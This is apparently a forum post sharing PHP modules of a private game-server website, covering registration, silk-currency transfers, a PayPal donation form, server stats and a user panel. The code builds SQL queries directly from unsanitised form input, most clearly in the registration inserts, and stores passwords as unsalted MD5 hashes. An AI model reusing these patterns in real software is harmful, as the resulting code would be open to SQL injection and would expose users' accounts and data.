        if(!security::isCorrectEmail($_POST['email']))                 $errors[] = "Invalid email address";
        if($_POST['pass1'] != $_POST['pass2'])                          $errors[] = "Password fields dosent match";
        
        
        if(count($errors) > 0)
        {?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post">
                <h3>Register a new account</h3>
            
                <?php for($i = 0; $i < count($errors); $i++)
                {?>
                <p><?php echo $errors[$i].".<br/>";?></p>            
                <?php }?>
            </form>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->

        <?php }
        else
        {
            
            if(user::accountExists($_POST['username']) == 1)
            {?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post">
                <h3>Register a new account</h3>
                <p>This username is already taken.</p>
            </form>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
            <?php }
            else
            {
                core::$sql -> exec("insert into TB_User(StrUserID,password,reg_ip,sec_content,sec_primary, email) values('$_POST[username]','".md5($_POST['pass1'])."','".$_SERVER['REMOTE_ADDR']."','3','3','$_POST[email]')");
                $nJID = user::accountJIDbyUsername($_POST['username']);
                $szAvatarDefault = "img/noavatar.png";
                core::$sql -> exec("insert into srcms_userprofiles(JID,gender,skype,sec_question,sec_answer,avatar,whois, ispublic) values('$nJID','0','None','$_POST[sec_question]','$_POST[sec_answer]','$szAvatarDefault','user','1')");
                core::$sql -> exec("insert into SK_Silk(JID,silk_own,silk_gift,silk_point) values('$nJID','".$core -> aConfig['startSilk']."','0','0')");
                
                if(isset($_SESSION['ref']))
                {
                    if($_SESSION['ref'] == $_SESSION['username'])
                    {
                        echo "<br/>You can't be refferer for your own account (but account created).<br/>";
                        return;
                    }
                    $reffererJID = user::accountJIDbyUsername($_SESSION['ref']);
                    if($reffererJID > 0)
                    {
                        $nRefIPs = core::$sql -> numRows("select * from srcms_refferals where IP='".$_SERVER[REMOTE_ADDR]."'");
                        if($nRefIPs < $core -> aConfig['maxRefAccIP'])
                        {
                            $datetime = gmDate('Y-m-d H:i:s');
                            core::$sql -> exec("insert into srcms_refferals(reffererJID,invitedUserJID,time,ip) values('$reffererJID','$nJID','$datetime','$_SERVER[REMOTE_ADDR]')");
                            unset($_SESSION['ref']);
                        }
                    }
                }
                $sName = $core -> aConfig['serverName'];
                @mail($_POST['email'],"Thanks for registering at $sName","Thanks for registering at $sName, we really hope you will have a great fun playing here.","From:$noreply@$sName");?>
                
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post">
                <h3>Register a new account</h3>
                <p>You have successfully registered you account, thank you for joining Rival-Online.</p>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
                <?php misc::redirect("?pg=Home", 5);
            }
        }
    }
    else
    {
        //todo:add ajax validator
?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Register a new account</h3>
                                                                                    <div class="controls">
                            <label>Username <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                <span class="add-on"><i class="icon-user"></i></span>
                                <input type="text" name="username" autocomplete="off" maxlength="16" placeholder="User Name" style="width: 165%" class=""/>
                            </div>
                            
                            <label>Email Address <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                <span class="add-on"><i class="icon-envelope"></i></span>
                                <input type="email" name="email" autocomplete="off" maxlength="54" placeholder="Email" style="width: 165%" class=""/>
                            </div>
                        </div>
                        <div class="controls">
                            <div class="span6">
                                <label>Password <span class="color-red">*</span></label>
                                <div class="input-prepend">
                                    <span class="add-on"><i class="icon-lock"></i></span>
                                    <input type="password" name="pass1" autocomplete="off" maxlength="32" placeholder="Password" style="width: 80%" class=""/>
                                </div>
                            </div>
                            <div class="span6">
                                <label>Confirm Password <span class="color-red">*</span></label>
                                <div class="input-prepend">
                                    <span class="add-on"><i class="icon-lock"></i></span>
                                    <input type="password" name="pass2" autocomplete="off" maxlength="32" placeholder="Confirm Password" style="width: 80%" class=""/>
                                </div>
                            </div>
                        </div>
                        <div class="controls">
                            <label>Security Question <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                    <span class="add-on"><i class="icon-question-sign"></i></span>
                                    <input type="text" autocomplete="off" maxlength="16" placeholder="Security Question" name="sec_question" style="width: 165%" class=""/>
                            </div>
                            <label>Security Answer <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                    <span class="add-on"><i class="icon-info-sign"></i></span>
                                    <input type="text" autocomplete="off" maxlength="16" placeholder="Security Answer" name="sec_answer" style="width: 165%" class=""/>
                            </div>
                        </div>
                        <!--div>
                            <label>Are you human ? <span class="color-red">*</span></label>
                            <script type="text/javascript">
                             var RecaptchaOptions = {
                                theme : 'clean'
                             };
                             </script>
                             
                            <center><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LeBrO8SAAAAAHKPgsJuYPS1vViiXLElqixSq3zc"></script>
                            <noscript>
                                <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LeBrO8SAAAAAHKPgsJuYPS1vViiXLElqixSq3zc" height="300" width="500" frameborder="0"></iframe><br/>
                                <textarea name="recaptcha_challenge_field" rows="3" cols="40"></textarea>
                                <input type="hidden" name="recaptcha_response_field" value="manual_challenge"/>
                            </noscript></center>
                            <br>
                        </div-->
                        <div class="controls form-inline">
                            <label class="checkbox"><input type="checkbox" />&nbsp; I read <a href="?pg=tos">Terms and Conditions</a></label>
                            <input type="submit" name="submit" class="btn-u pull-right" value="Register">
                        </div>
                        <hr />
                        <p>Already Signed Up? Click <a href="?pg=Login" class="color-green">Sign In</a> to login your account.</p>
                                                           </form>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
<?php 
    }
?>

rules

كود PHP:

<table border='1' id='table-3' cellpadding='0' cellspacing='0'>
<tr>
<td>1. Botting is allowed! (Gold Botting with or without Proxies is forbidden)</td>
</tr>
<tr>
<td>2. The Team should be treated with respect! rules must be followed!</td>
</tr>
<tr>
<td>3. Don't insult other Players, be friendly!</td>
</tr>
<tr>
<td>4. Begging for Items or Events is not allowed!</td>
</tr>
<tr>
<td>5. PK2 Editing are completely forbidden!</td>
</tr>
<tr>
<td>6. If you found a bug , you must report it and not use it.!</td>
</tr>
<tr>
<td>7. Murder on Events is not allowed!</td>
</tr>
</table> 


sendsilks

كود PHP:

<?php
function check_pers ($per,$total){
  //  $num = ceil($snum);
    $total = ceil($total);
    $num = ceil($total * $per) / 100 ;
    return ($num);
} 
    if (isset($_POST['sendsilk'])) {

    //    $user = $sec->secure($_POST['username']);
        $email = security::secure($_POST['name']);
        $amont = security::secure($_POST['amont']);
        //$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'");
        if (empty($_POST['amont']) || (empty($_POST['name']) )) {
            echo 'Error:';
            echo '<br />';
            echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
            unset($_POST['sendsilk']);
                    }


            if(user::accountExists($email) == 1) {
                        echo '
                        Error
                        <br />
                        <form  method="POST">
                        <label><span style="color: red;font-weight:bold;font-size: medium;"> character name !!! </span></label>
                        ';
                    } else {
                        $IDs = user::accountJIDbyUsername($_SESSION['username']);
                        $silk_own = user::getSilkByUsername($IDs);
            if (($_POST['amont']) > $silk_own) {
                    echo 'Error :';
                    echo '<br />';
                    echo "You do not have $amont silk";
                    } else {
            if (($_POST['amont']) < 10) {
            
                    echo '
           Error
           <br />
            <form   method="POST">
            <label><span style="color: red;font-weight:bold;font-size: medium;"> You can`t send less than 10 silk !!! </span></label>
            ';
                    } else {
                    if (($_POST['name']) == ($_SESSION['username'])) {
            
                                        echo '
            <div class="top">Error</div>
            <br />
            <form    method="POST">
            <label>You can`t send to <span style="color: red;font-weight:bold;font-size: medium;"> '.($_SESSION['username']).'</span></label>
            ';
                    } else {
                    function check_($val)
                        {
                        if( $val % 2 == 0 )
                            {
                        return false;
                        }
                        else
                        {
                        return true;
                        }
                    }
                    if (check_($amont)) {
            
                        echo '<div id="content">
            <div class="top">Error</div>
            <div class="content">
            <div id="content" class="content-inner">
            <form    method="POST">
            <div class="reg">
            <label><span style="color: red;font-weight:bold;font-size: medium;">$amont is an odd number ... No single number can be written so that a discount of 10% of the figure</span></label>
            </div>
            </div>
            </div>
            <div class="bottom"></div>
            </div>
            </div>
            ';
                    } else {
                    $per = $amont;
                        $num = 10;
                        $nsba100 = check_pers($per,$num); 
                        $checkID = user::accountJIDbyUsername($email);
                        $silk_own = user::getSilkByUsername($IDs);
                         while ($row = mssql_fetch_array($checkID)) {
                        $IDs = $row['JID'];
                        }
                        $checkID = user::accountJIDbyUsername($_SESSION['username']);
                         while ($row = mssql_fetch_array($checkID)) {
                        $IIDs = $row['JID'];
                        core::$sql -> exec("update SK_Silk set silk_own = silk_own - '".$amont."' WHERE JID = '".$IIDs."'");
                        core::$sql -> exec("update SK_Silk set silk_own = silk_own + '".$amont."' - '".$nsba100."' WHERE JID = '".$IDs."'");
                        }
                            echo '
                            sent successfully !
                            <br />
                            <form   method="POST">
                            <br />
                            <label><span style="color: green;font-weight:bold;font-size: medium;">'.$amont.' silks sent successfully</span></label>
                            ';
                    }
                }
            }
        }
    }
}
     else {
        //}    
    //    $user = $sec->secure($_POST['username']);
        //$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'");
                        $checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
                         while ($row = mssql_fetch_array($checkID)) {
                        $IDs = $row['JID'];
                        }
                        $silk_own = user::getSilkByUsername($IDs);
        echo '
            Send Silk system .
            <form  name="registerform" id="formID" method="post" autocomplete="off" >
                        <span style="color: #FF0000;font-weight:bold; font-size:  15px; ">    10%</span> <span style="font-weight:bold; font-size:  15px; ">will be deducted from the Silk sender</span><br /><br />

                                            <table width="70%" style="text-align:center;align:center;margin-left:15%;">
                <tr>
                    <td >        <br /><p style="font-size : 13px;"> Enter your Silk :</p></td>
                    <td >        <br /><p style="font-size : 13px;"><input  type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="amont" value=""  /></p></td>
                </tr>
                <tr>
                    <td >        <br /><p style="font-size : 13px;"> Send To (Username) :</p></td>
                    <td >        <br /><p style="font-size : 13px;"><input type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="name" value=""  /></p></td>
                </tr>
            </table>

        
                <table>
                <td >
                <br/><input style="height:32px;vertical-align:middle;margin-left: 150px;" class="submitButton" type="submit" value="send silk" name="sendsilk" />
                </td>
                </table>
';
}
?>

sendsilks1

كود PHP:

<?php

core::$sql -> changeDB("acc");

function check_pers($per,$total){
//  $num = ceil($snum);
$total = ceil($total);
$num = ceil($total * $per) / 100 ;
return ($num);
} 
if (isset($_POST['sendsilk'])) {

$useridnum = security::secure($_POST['name']);
$amount = security::secure($_POST['amount']);
if (empty($_POST['amount']) || (empty($_POST['name']) )) {
echo 'Error:<br />';
echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['sendsilk']);
}
core::$sql -> changeDB("acc");
$checkcs = core::$sql -> numRows("SELECT * FROM TB_User WHERE StrUserID = '".$useridnum."'");
if ($checkcs != 1) {
echo '
Error
<br />
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> character name !!! </span></label>
<br />
';
} else {
core::$sql -> changeDB("acc");
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$querys = core::$sql -> exec("select * from SK_Silk where JID = '".$IDs."'");
while ($row = core::$sql -> fetchArray($querys)) {
$silk_own = $row['silk_own'];
}
if (($_POST['amount']) > $silk_own) {

echo 'Error :';
echo '<br />';
echo "You do not have $amount silk";
} else {
if (($_POST['amount']) < 10) {

echo '
Error
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> You can`t send less than 10 silk !!! </span></label>
';
} else {
if (($_POST['name']) == ($_SESSION['username'])) {

echo '
Error:
<form method="POST">
<label>You can`t send to <span style="color: red;font-weight:bold;font-size: medium;"> '.($_SESSION['username']).'</span></label>
';
} else {
function check_($val)
{
if( $val % 2 == 0 )
{
return false;
}
else
{
return true;
}
}
if (check_($amount)) {

echo '
Error
<br />
<form   method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;">$amount is an odd number ... No single number can be written so that a discount of 10% of the figure</span></label>
';

} else {
core::$sql -> changeDB("acc");
$per = $amount;
$num = 10;
$nsba100 = check_pers($per,$num); 
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$useridnum."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$checkIID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkIID)) {
$IIDs = $row['JID'];
core::$sql -> changeDB("acc");
core::$sql -> exec("update SK_Silk set silk_own = silk_own - '".$amount."' WHERE JID = '".$IIDs."'");
core::$sql -> exec("update SK_Silk set silk_own = silk_own + '".$amount."' - '".$nsba100."' WHERE JID = '".$IDs."'");
}
echo '
successfully
<form   method="POST">
<label><span style="color: green;font-weight:bold;font-size: medium;">Send '.$amount.' silk successfully</span></label>
';
}
}
}
}
}
}
else {
core::$sql -> changeDB("acc");
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$querys = core::$sql -> exec("select * from SK_Silk where JID = '".$IDs."'");
while ($row = core::$sql -> fetchArray($querys)) {
$silk_own = $row['silk_own'];
}
echo '
Send Silk System
<form name="registerform" id="formID" method="post" autocomplete="off" >

<span style="color: #FF0000;font-weight:bold; font-size:  15px; ">    10%</span> <span style="font-weight:bold; font-size:  15px; ">will be deducted from the Silk sender</span><br /><br />
<table width="70%" style="text-align:center;align:center;margin-left:15%;">
<tr>
<td ><br /><p style="font-size : 13px;"> Enter your Silk :</p></td>
<td ><br /><p style="font-size : 13px;"><input class="validate[required,custom[onlyNumberSp],minSize[0],maxSize[14],ajax[ajaxUserCallPhpSilk]] textboxt" type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="amount" value=""  /></p></td>
</tr>
<tr>
<td ><br /><p style="font-size : 13px;"> Send To (Username) :</p></td>
<td ><br /><p style="font-size : 13px;"><input type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="name" value="" class="validate[required,minSize[4],maxSize[16]] textboxt"  /></p></td>
</tr>
</table>


<table>            <td ><br/>    <input style="height:32px;vertical-align:middle;margin-left: 150px;" class="submitButton" type="submit" value="send silk" name="sendsilk" /></td>
</table>

</form>            

';
}
?>

shop

كود PHP:

    <?php
    global $core;
    $servername = $core -> aConfig['serverName'];
    $getsiteurl = $_SERVER['SERVER_NAME'];
    $username = $_SESSION['username'];
    ?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Donate</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Donate</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table width='100%' height='422' border='1' align='center' cellpadding='0' cellspacing='0'>
    <tbody>
<form name='_xclick' action='https://www.paypal.com/cgi-bin/webscr' method='post'>
    <input type='hidden' name='cmd' value='_xclick' />
    <input type='hidden' name='business' value='[email protected]' />
    <input type='hidden' name='currency_code' value='USD' />
    <input type='hidden' id='input' name='custom' value='<?php echo $username;?>' />
    <input type='hidden' name='item_name' value='Rival-Online Online Goods - Virtual Points in [<?php echo $servername;?>] User :[<?php Echo $username;?>] '/>
    Hello <font style='color:red;'><?php echo $username;?> </font>, Please Choose the Amount of Silks: <br />
<select style='color:red;background: rgba(0,0,0,4.0);width:250px;' name='amount'>
    <option style='color:red' value='5' name='1 x 300 Silk (USD 5.00)'>300 Silk (USD 5.00)
    <option style='color:red' value='10' name='1 x 700 Silk (USD 10.00)'>700 Silk (USD 10.00)
    <option style='color:red' value='15' name='1 x 1100 Silk (USD 15.00)'>1100 Silk (USD 15.00)
    <option style='color:red' value='25' name='1 x 2000 Silk (USD 25.00)'>2000 Silk (USD 25.00)
    <option style='color:red' value='50' name='1 x 4500 Silk (USD 50.00)'>4500 Silk (USD 50.00)
</select>
    <input type='hidden' name='return' value='http://<?php echo $getsiteurl;?>/?pg=news'>
    <input type='hidden' name='notify_url' value='http://<?php echo $getsiteurl;?>/module/ipn.php'>
    <input style='width: 99px;vertical-alignt:midle;border:none;' type='image' src='http://www.paypalobjects.com/en_US/i/btn/btn_buynow_LG.gif' name='submit' alt='PayPal - The safer, easier way to pay online!' />
</form>
    <br /><br />
    <b>Before you continue with the silks charge you must agree that you wont ChargeBack and also that you read those Terms of Use :</b><br />
    <a href='?pg=tos'>Terms and Conditions</a>
    </tbody>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->

stats_menu

كود PHP:

<?php
$data = $core -> aConfig;
$hGwStatus = @fsockopen($data['serverIP'], $data['gatewayPort'], $errno, $errstr, 0.3);
$hGsStatus = @fsockopen($data['serverIP'], $data['gamePort'], $errno, $errstr, 0.3);
$hStatuses = array();
$onlineImg = "<img src='img/status/online.gif' />";
$offlineImg = "<img src='img/status/offline.gif' />";
if($hGwStatus) { $hStatuses['gw'] = $onlineImg; }
else { $hStatuses['gw'] = $offlineImg; }

if($hGsStatus) { $hStatuses['gs'] = $onlineImg; }
else { $hStatuses['gs'] = $offlineImg; }

$nOnlinePlayers = misc::getOnlinePlayersCount();
core::$sql -> changeDB('acc');
$nAccounts = core::$sql -> getRow("select count(*) from TB_User");
$nPlayersMax = core::$sql -> getRow("SELECT top 1 nUserCount FROM _ShardCurrentUser WHERE nShardID = '".$core -> aConfig['shardID']."' ORDER BY nUserCount desc");

core::$sql -> changeDB('shard');

$nChars = core::$sql  -> getRow("select count(*) from _Char");
$nGuilds = core::$sql  -> getRow("select count(*) from _Guild");

core::$sql  -> changeDB('acc');

echo " 
        <hr>
        <b> Server info :</b><br/>
        <hr>
        Players online: <font color='green'>$nOnlinePlayers/$data[playersLimit]</font><br/>
        Max online: <font color='green'>$nPlayersMax</font><br/>
        Experience rate: <font color='green'>$data[expRate]</font><br/>
        Party Experience rate: <font color='green'>$data[partyExpRate]</font><br/>
        Gold drop coeficent: <font color='green'>$data[goldDropRate]</font><br/>
        Item drop coeficent: <font color='green'>$data[itemDropRate]</font><br/>
        <hr>
        <b>Status :</b><br/>
        <hr>
        Gateway Server: $hStatuses[gw]<br/>
        Game Server: $hStatuses[gs]<br/>
        Accounts: <font color='green'>$nAccounts</font><br/>
        Characters: <font color='green'>$nChars</font><br/>
        Guilds: <font color='green'>$nGuilds</font>
        ";
?>

ucp

كود PHP:

<?php     
     global  $core;
     
     if(isset($_SESSION['username']))
     {
         
        //core::$ucp -> showMenu();
        #echo "You are logged in as <b>$_SESSION[username]</b>.<br/><br/>";
        
        if(isset($_GET['act']))
        {
            switch($_GET['act'])
            {
                case('changepw'):
                {
                    //module disabled
                    if($core -> aConfig['allowChangePw'] == 0) 
                    {
                        echo $core -> aConfig[0];
                        echo "This module is currently disabled.";
                        return;
                    }
            
                    if(isset($_POST['submit']))
                    {
                        //process data
                        if(!security::isSecureString($_POST['password_old'], 3)) $errors[] = "Password [old] contains forbidden symbols";
                        if(!security::isSecureString($_POST['password_new'], 3)) $errors[] = "Password [new] contains forbidden symbols";
                        if(strlen($_POST['password_old']) > 32) $errors[] = "Password [old] too long";
                        if(strlen($_POST['password_old']) < 6)    $errors[] = "Password [old] too short";
                        if(strlen($_POST['password_new']) > 32)    $errors[] = "Password [new] too long";
                        if(strlen($_POST['password_new']) < 6)    $errors[] = "Passwrod [new] too short";
                        if($_POST['password_new'] !== $_POST['password_new_confirm']) $errors[] = "New Passwords does not match!.";
                        
                        if(count($errors) > 0)
                        {
                            foreach($errors as $nElement)
                            {
                                echo $nElement.".<br/>";
                            }
                            misc::back();
                        }
                        else
                        {
                            //verify
                            if(user:: changePassword($_SESSION['username'], $_POST['password_old'], $_POST['password_new']))
                            {
                                echo "Password changed successfully. <br/>";
                                misc::redirect('?pg=ucp', 1);
                            }
                            else
                            {
                                echo "Invalid old password specified.<br/>";
                                misc::back();
                            }
                        }
                    }
                    else core::$ucp -> showChangepwForm();
                }
                break;
                
                case('logout'):
                {
                    if(user::logout())
                    {
                        echo "Successfully logged out. Redirecting.<br/>";
                        misc::redirect('?pg=Home', 1);
                    }
                    else
                    {
                        echo "Failed to logout.<br/>";
                    }
                }
                break;
                
                case('refferals'):
                {
                    
                    if($core -> aConfig['allowRefferals'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                
                
                    
                    $hQuery = mssql_query("select invitedUserJID,time,bonusAdded from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                    $nCount = core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                    echo "You can reffer [<b>".$core -> aConfig['maxRefAccIP']."</b>] accounts with same ip address [limit].<br/><br/>";
                    
                    if($nCount == 0)
                    {
                        echo "<br/>You didn't reffer anyone yet.</br>";
                    }
                    else
                    {
                        echo "
                        <table id='table-3' border='1' cellpadding='0' cellspacing='0'>
                        <td>Username</td><td>Time</td>";
                        if($core -> aConfig['allowRefferalsBonus'] == 1)
                        {
                            echo "<td>Bonus status</td>";
                        }
                        echo "</tr>";
                        
                        
                        while($row = mssql_fetch_array($hQuery))
                        {
                            echo "<td><a href='?pg=viewprofile&username=".user::usernamyByJID($row[invitedUserJID])."'>".user::usernamyByJID($row[invitedUserJID])."</a></td><td>$row[time]</td>";
                            if($core -> aConfig['allowRefferalsBonus'] == 1)
                            {
                                if($row['bonusAdded'] == 1)
                                {
                                    echo "<td>Applied</td>";
                                }
                                else echo "<td>Not applied</td>";
                            }
                            echo "</tr>";
                        }
                        
                        if($core -> aConfig['allowRefferalsBonus'] == 1)
                        {
                            if($_GET['do'] == 'receive_bonus')
                            {
                                $nSilk = $core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'");
                                core::$sql -> exec("update srcms_refferals set bonusAdded='1' where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
            
                                user::addSilk($_SESSION['username'], $nSilk);
                                echo "<br/><b>You received your bonuses.</b><br/>";
                                misc::redirect("?pg=Home", 1);
                            }
                            else
                            {
                                $nSilk = $core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'");
                                if(($core -> aConfig['refferalsBonusSilk'] * $nSilk) > 0)
                                {
                                    echo "</table><br/>Bonus: [".$core -> aConfig['refferalsBonusSilk']."] silk per refferal<br/>Total amount of users reffered by you: <b>$nCount</b><br/><br/><a href='?pg=ucp&act=refferals&do=receive_bonus'>Receive bonus silk [".$core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'")."]";
                                }
                            }
                        }
                        else echo "<br/>You can't receive any bonus for refferals at the moment.<br/>";
                        
                        
                    }
                    
                }
                break;
                case('mailbox'):
                {
                 //module disabled
                    if($core -> aConfig['allowMailbox'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                    
                    echo "<br/><a href='?pg=ucp&act=mailbox&newmsg' class='btn-u'>Write a new message</a><br/><br/>";
                    
                    if(isset($_GET['newmsg']))
                    {
                        if(!isset($_POST['submit']))
                        {
                            core::$ucp -> showSendWebMsgForm();
                        }
                        else
                        {
                            //process send msg data
                            if(!security::isSecureString($_POST['recvName'], 3)) $errors[] = "Receiver username contains forbidden symbols";
                            if(strlen($_POST['recvName']) > 16) $errors[] = "Receiver username too long";
                            if(strlen($_POST['recvName']) < 3)    $errors[] = "Receiver username too short";
                            if(strlen($_POST['msgTitle']) > $core -> aConfig['maxPrivMsgTitleLen']) $errors[] = "Message title too long";
                            if(strlen($_POST['msgText']) > $core -> aConfig['maxPrivMsgBodyLen']) $errors[] = "Message body too long";
                            if(strlen($_POST['msgTitle']) < $core -> aConfig['minPrivMsgTitleLen']) $errors[] = "Message title too short";
                            if(strlen($_POST['msgText']) < $core -> aConfig['minPrivMsgBodyLen'])    $errors[] = "Message body too short";
                            
                            if(count($errors) > 0)
                            {
                                foreach($errors as $nElement)
                                {
                                    echo $nElement.".<br/>";
                                }
                                misc::back();
                            }
                            else
                            {
                                //db
                                //user::sendWebPrivMsg($to, $from, $title, $text)
                                if(user::accountExists($_POST['recvName']))
                                {
                                    user::sendWebPrivMsg($_POST['recvName'], $_SESSION['username'], $_POST['msgTitle'], $_POST['msgText']);
                                } 
                                else 
                                {
                                    echo "Account with such username not found.<br/>";
                                    misc::back();
                                }
                            }
                        }
                        //lol
                        echo "<br/><br/>";
                    }
                    
                    $myJID = user::accountJIDbyUsername($_SESSION['username']);
                
                    $nMsgCount = core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID'");
                    
                    if(isset($_GET['view']))
                    {
                        $nMsgID = (int)$_GET['view'];
                        if(core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'") > 0)
                        {
                            $msgData = core::$sql -> fetchArray("select * from srcms_privatemessages where id='$nMsgID'");
                            $msgData['msg'] =  security::fromHTML($msgData['msg']);
                            $msgData['msg'] =  misc::applyAttributesToText($msgData['msg']);
                            $szSender = user::usernamyByJID($msgData['sender']);
                            echo "<br/><table id='table-3' width='380' border='1' cellpadding='0' cellspacing='0'>
                                    <td>Title</td><td>$msgData[title]</td></tr>
                                    <td>From</td><td><a href='?pg=viewprofile&username=$szSender' class='btn-u'>$szSender</a></td></tr>
                                    <td height='50'>Text</td><td width='300' height='50'>$msgData[msg]</td>
                                    </table>
                                 ";
                            core::$sql -> exec("update srcms_privatemessages set viewed='1' where id='$nMsgID'");
                            echo "<br/><br/><br/>";
                        } else echo "You can't view message that does not belong to you.<br/>";
                    
                    }
                    
                    if($nMsgCount > 0)
                    {
                        if($nMsgCount == $core -> aConfig['maxPrivMsg']) echo "Your inbox is full. <br/>";
                        $hQuery = core::$sql -> exec("select * from srcms_privatemessages where receiver='$myJID' order by time desc");
                    
                        
                        echo "<table id='table-3' border='1' cellpadding='0' cellspacing='0'>
                            <td>From</td><td>Title</td><td>Time</td><td>Viewed</td><td>Link to view it</td><td>Delete</td></tr>";
                        while($row = mssql_fetch_array($hQuery))
                        {
                            $szSender = user::usernamyByJID($row['sender']);
                            
                            if($row['viewed'] == '1')  echo "<td><a href='?pg=viewprofile&username=$szSender' class='btn-u'>$szSender</a></td><td>$row[title]</td><td>$row[time]</td><td>Yes</td><td><a href='?pg=ucp&act=mailbox&view=$row[id]' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del=$row[id]' class='btn-u'>Delete</a></td></tr>";
                            else  echo "<td><b><a href='?pg=viewprofile&username=$szSender'>$szSender</a></b></td><td><b>$row[title]</b></td><td>$row[time]</td><td><b>No</b></td><td><a href='?pg=ucp&act=mailbox&view=$row[id]' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del=$row[id]' class='btn-u'>Delete</a></td></b></tr>";
                
                        }
                        echo "</table>";
                        
                        
                        if(isset($_GET['del']))
                        {
                            $nMsgID = (int)$_GET['del'];
                            if(core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'") > 0)
                            {
